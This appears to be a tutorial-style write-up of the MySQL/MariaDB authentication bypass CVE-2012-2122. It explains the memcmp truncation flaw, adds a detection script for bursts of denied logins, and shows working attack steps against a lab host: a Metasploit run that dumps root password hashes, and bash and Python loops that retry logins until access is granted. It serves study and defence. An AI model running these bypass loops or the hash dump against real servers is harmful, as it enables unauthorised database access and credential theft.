1. Vulnerability overview

When a client connects to MariaDB/MySQL, the password it supplies is compared with the expected correct password. Because the result of that comparison is handled incorrectly, MySQL could treat the two passwords as equal even when memcmp() returned a non-zero value. According to the advisory, roughly one attempt in 256 is accepted by chance.

Affected products:

All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
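The defect the advisory describes is easier to understand in code. The following Python model is added here and is not taken from the page or from the MySQL/MariaDB sources: it reimplements the native-password handshake (the client token and the server-side check) with hashlib, then runs the comparison both ways, the pre-fix variant that returns memcmp()'s int result through a char-sized return value, and the fixed variant that tests the full int. The word_memcmp function is a constructed stand-in for an optimized libc memcmp that returns wide differences rather than -1/0/1; the password, scramble and seed values are constructed too.

```python
"""Model of the CVE-2012-2122 comparison defect (added example; not MySQL's code)."""
import hashlib
import random

SHA1_HASH_SIZE = 20


def sha1(data: bytes) -> bytes:
    return hashlib.sha1(data).digest()


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def stored_hash(password: bytes) -> bytes:
    """What mysql.user holds for native authentication: SHA1(SHA1(password))."""
    return sha1(sha1(password))


def client_token(scramble: bytes, password: bytes) -> bytes:
    """Token the client sends: SHA1(password) XOR SHA1(scramble || SHA1(SHA1(password)))."""
    stage1 = sha1(password)
    return xor_bytes(stage1, sha1(scramble + sha1(stage1)))


def bytewise_memcmp(a: bytes, b: bytes) -> int:
    """Textbook memcmp: difference of the first differing byte pair (-255..255)."""
    for x, y in zip(a, b):
        if x != y:
            return x - y
    return 0


def word_memcmp(a: bytes, b: bytes) -> int:
    """Constructed stand-in for an optimized memcmp that compares 16-bit little-endian
    words and returns their raw difference (-65535..65535). memcmp() is only specified
    to return <0, 0 or >0; nothing guarantees the value fits in a char."""
    for i in range(0, len(a), 2):
        wa = int.from_bytes(a[i:i + 2], "little")
        wb = int.from_bytes(b[i:i + 2], "little")
        if wa != wb:
            return wa - wb
    return 0


def to_signed_char(value: int) -> int:
    """Implicit C conversion of an int to a signed 8-bit char (keeps the low byte)."""
    return ((value + 128) & 0xFF) - 128


def check_scramble(scramble, token, stored, memcmp_impl, truncate):
    """Server-side check: recover SHA1(password) from the token, hash it once more and
    compare with the stored value. truncate=True models the pre-fix code, where the
    int from memcmp() was returned through a char-sized my_bool; any multiple of 256
    then reads as 0 ("equal"). The fixed code tests the full int for non-zero."""
    stage1_candidate = xor_bytes(token, sha1(scramble + stored))
    reassured = sha1(stage1_candidate)
    result = memcmp_impl(stored, reassured)
    if truncate:
        result = to_signed_char(result)
    return result == 0


def estimate_false_accept_rate(trials: int, seed: int = 1) -> float:
    """Fraction of random (wrong) tokens the truncating check accepts when memcmp
    returns wide differences. Expected value is about 1/256, matching the advisory."""
    rng = random.Random(seed)
    scramble = bytes(rng.getrandbits(8) for _ in range(SHA1_HASH_SIZE))
    stored = stored_hash(b"correct-password")  # constructed
    hits = 0
    for _ in range(trials):
        token = bytes(rng.getrandbits(8) for _ in range(SHA1_HASH_SIZE))
        if check_scramble(scramble, token, stored, word_memcmp, truncate=True):
            hits += 1
    return hits / trials


if __name__ == "__main__":
    print(f"to_signed_char(256) = {to_signed_char(256)}")
    print(f"false-accept rate with truncation: {estimate_false_accept_rate(20000):.4f}")
```

In this model the truncation is harmless with a byte-wise memcmp, whose result can never be a multiple of 256, and becomes a roughly 1-in-256 false accept with the wide-difference one, which is the figure the advisory quotes. The lesson for code review is the general one: a comparison result must be normalised to a boolean before it crosses a narrower type.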

2. Impact

Knowing only a username, an attacker who simply keeps retrying can log straight into the SQL database.

3. Verification

 (1) Metasploit

msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > info

       Name: MySQL Authentication Bypass Password Dump
     Module: auxiliary/scanner/mysql/mysql_authbypass_hashdump
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2012-06-09

Provided by:
  theLightCosine <theLightCosine@metasploit.com>
  jcran <jcran@metasploit.com>

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  RHOSTS                     yes       The target address range or CIDR identifier
  RPORT     3306             yes       The target port (TCP)
  THREADS   1                yes       The number of concurrent threads
  USERNAME  root             yes       The username to authenticate as

Description:
  This module exploits a password bypass vulnerability in MySQL in
  order to extract the usernames and encrypted password hashes from a
  MySQL server. These hashes are stored as loot for later cracking.

References:
  https://cvedetails.com/cve/CVE-2012-2122/
  OSVDB (82804)
  https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql

msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 192.168.118.130
RHOSTS => 192.168.118.130
msf auxiliary(mysql_authbypass_hashdump) > run

[+] 192.168.118.130:3306 - 192.168.118.130:3306 The server allows logins, proceeding with bypass test
[*] 192.168.118.130:3306 - 192.168.118.130:3306 Authentication bypass is 10% complete
[*] 192.168.118.130:3306 - 192.168.118.130:3306 Authentication bypass is 20% complete
[*] 192.168.118.130:3306 - 192.168.118.130:3306 Successfully bypassed authentication after 207 attempts. URI: mysql://root:iTk@192.168.118.130:3306
[+] 192.168.118.130:3306 - 192.168.118.130:3306 Successfully exploited the authentication bypass flaw, dumping hashes...
[+] 192.168.118.130:3306 - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.118.130:3306 - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.118.130:3306 - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.118.130:3306 - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.118.130:3306 - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[*] 192.168.118.130:3306 - 192.168.118.130:3306 Hash Table has been saved: /root/.msf4/loot/20180829155507_default_192.168.118.130_mysql.hashes_835663.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_authbypass_hashdump) >

 (2) Linux shell

root@kali:~# for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.118.130  ; done
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 1513
Server version: 5.5.23 Source distribution

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> select version();
+-----------+
| version() |
+-----------+
| 5.5.23 |
+-----------+
1 row in set (0.00 sec)

MySQL [(none)]>
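From the defender's side, the observable signature of the run above is a tight burst of "Access denied" entries for one user from one source host, followed by a successful connection. The following Python detector is an added example and not part of the original post: it parses MySQL 5.5-style error-log lines (the line format and the sample log are constructed assumptions; the server only writes these entries with log_warnings raised above its default) and flags any user/host pair that exceeds a threshold of denied logins inside a sliding time window.

```python
"""Flag the CVE-2012-2122 login pattern in a MySQL error log (added example)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed 5.5-era error-log line format for denied logins.
LINE_RE = re.compile(
    r"^(?P<date>\d{6})\s+(?P<time>\d{1,2}:\d{2}:\d{2}) \[Warning\] "
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)' "
    r"\(using password: (?:YES|NO)\)\s*$"
)


def parse_line(line: str):
    """Return (timestamp, user, host) for an access-denied line, else None."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(f"{m['date']} {m['time']}", "%y%m%d %H:%M:%S")
    return ts, m["user"], m["host"]


def find_bursts(lines, threshold: int = 20, window_seconds: int = 60):
    """Sliding-window counter per (user, host). Returns a dict mapping each pair that
    reached `threshold` denied logins within `window_seconds` to (ISO time of the
    event that tripped the threshold, number of denials in the window at that moment).
    Lines are expected in chronological order, as the error log writes them."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)
    alerts = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue  # not an access-denied entry
        ts, user, host = parsed
        key = (user, host)
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:  # drop events older than the window
            q.popleft()
        if len(q) >= threshold and key not in alerts:
            alerts[key] = (ts.isoformat(), len(q))
    return alerts


def make_sample_log() -> str:
    """Constructed sample: two stray failures from an application host, a burst of 25
    denials for root from one source inside four seconds, then one more stray failure."""
    def line(ts, user, host):
        return (f"{ts:%y%m%d %H:%M:%S} [Warning] Access denied for user "
                f"'{user}'@'{host}' (using password: YES)")
    burst_start = datetime(2018, 8, 29, 15, 55, 5)
    entries = [(datetime(2018, 8, 29, 15, 50, 0), "app", "10.0.0.5"),
               (datetime(2018, 8, 29, 15, 52, 30), "app", "10.0.0.5")]
    entries += [(burst_start + timedelta(seconds=i // 8), "root", "192.168.118.128")
                for i in range(25)]
    entries.append((datetime(2018, 8, 29, 15, 58, 0), "app", "10.0.0.5"))
    return "\n".join(line(*e) for e in entries)


if __name__ == "__main__":
    for (user, host), (when, count) in find_bursts(make_sample_log().splitlines()).items():
        print(f"ALERT {when}: {count} denied logins for '{user}'@'{host}' within a minute")
```

A threshold of 20 per minute is far below the hundreds of attempts the bypass needs on average, so the alert fires long before the session in the transcript is established. The accepted login itself looks like any other successful connection in the error log, which is why the preceding burst, not the success, is the thing to alert on; the general log or an audit plugin is what records the Connect event that follows it.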

 (3) Python

The script simply calls subprocess.Popen in a loop to run the mysql client command:

#!/usr/bin/python
import subprocess

# Re-run the mysql client with a wrong password; each run blocks until the client exits.
while 1:
    subprocess.Popen("mysql -h 192.168.118.130 -u root mysql --password=blah", shell=True).wait()

Running it:

root@kali:~# python test.py
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)
